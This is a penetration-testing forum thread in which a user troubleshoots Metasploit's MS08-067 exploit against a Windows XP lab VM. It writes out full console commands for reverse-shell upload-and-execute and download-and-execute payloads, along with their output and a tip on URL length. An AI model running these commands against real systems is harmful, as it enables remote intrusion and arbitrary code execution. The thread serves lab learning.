Results 1 to 3 of 3

Thread: Help using payload windows upexec

  1. #1
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Default Help using payload windows upexec

    I'm testing the upexec but I'm not able to let it work, the ms08_067_netapi is working correctly with the meterpeter, but not with the upexec.

    I' using BT4 RC2, and on the metasploit console i do:

    use exploit/windows/smb/ms08_067_netapi
    set payload windows/upexec/reverse_tcp
    set rhost 192.168.1.2
    set lhost 192.168.1.1
    set pexec /root/data/payloads/test/calc.exe
    exploit

    I get:
    [*] Started reverse handler on 192.168.1.1:4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 2[*] Selected Target: Windows XP SP2 (NX)[*] Attempting to trigger the vulnerability...[*] Sending stage (398 bytes) to 192.168.1.2[*] Sleeping before handling stage...

    And it hang so...

    Any help about using the upexec payload?

  2. #2
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Help using payload windows upexec

    I never tried this particular exploit but a few basic verifications could be useful :
    - have you desactivated your AV ?
    - Same with firewall ?
    - Is your victim system vulnerable to this exploit ? MS has patched it : http://www.microsoft.com/technet/sec.../ms08-067.mspx

  3. #3
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Default Re: Help using payload windows upexec

    Hi ComaX, I will try to explain better:

    I never explored the upexec and download_exec payloads of the metasploit framework.

    So the purpose of the test is to download / upload and execute an exe file as payload.
    To make some tests I’m using two VM, one with BT4 RC2 and an XP Sp2 as victim.
    The victim has the firewall disabled and no antivirus.
    I’m trying to upload/download and execute the windows calculator (calc.exe)

    I know that with a meterpeter session is possible with a simple upload and execute, and i have tried just to double-check after your post...

    I’m experiencing some problems with both the following procedures in details:

    1 ------------ WITH UPEXEC:
    use exploit/windows/smb/ms08_067_netapi
    set payload windows/upexec/reverse_tcp
    set lhost 192.168.1.1
    set rhost 192.168.1.2
    set pexec /root/data/payloads/test/calc.exe
    exploit

    I got…

    Started reverse handler on 192.168.1.1:4444
    Automatically detecting the target...
    Fingerprint: Windows XP - Service Pack 2
    Selected Target: Windows XP SP2 (NX)
    Attempting to trigger the vulnerability...
    Sending stage (398 bytes) to 192.168.1.2
    Sleeping before handling stage...

    And it hang so without any result, the victim do not run the calc.exe
    I have also tried with a server application but nothing...

    So I have tried with a similar payload,

    2 ------------ WITH DOWNLOAD_EXEC:
    use exploit/windows/smb/ms08_067_netapi
    set payload windows/download_exec
    set lhost 192.168.1.1
    set rhost 192.168.1.2
    set url http://192.168.1.1/c.exe (httpd obviously active)
    exploit

    I got…

    Automatically detecting the target...
    Fingerprint: Windows XP - Service Pack 2
    Selected Target: Windows XP SP2 (NX)
    Attempting to trigger the vulnerability...
    Exploit completed, but no session was created.

    Even in that case the exe will not be executed on the victim…
    And checking the apache log, i can not see any request on the server...

    If you have time, and you are curious, I would like you to try personally those two payloads, that by the way i think to be very useful...

    As small tip, remember that the argument URL on the download_exec accept max 24 chars (after you will get a buffer error) so your url may be something like 192.168.1.1/1.exe (not 192.168.1.1/payload_test.exe)...

    When you have 10 minutes, if you are interested please let me know, I appreciate.

Similar Threads

  1. What is Payload and how to use it.?
    By moorejohn90 in forum Beginners Forum
    Replies: 1
    Last Post: 08-20-2010, 10:09 AM
  2. Replies: 3
    Last Post: 06-30-2010, 07:06 PM
  3. own payload SET
    By pentest09 in forum Beginners Forum
    Replies: 2
    Last Post: 06-02-2010, 12:29 PM
  4. Best Metasploit exploit/payload for windows XP sp2/3
    By bfrick50 in forum OLD Newbie Area
    Replies: 9
    Last Post: 11-25-2009, 05:47 PM
  5. Replace *.EXE with MSF payload ..
    By opreat0r in forum OLD Programming
    Replies: 2
    Last Post: 08-19-2008, 11:36 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •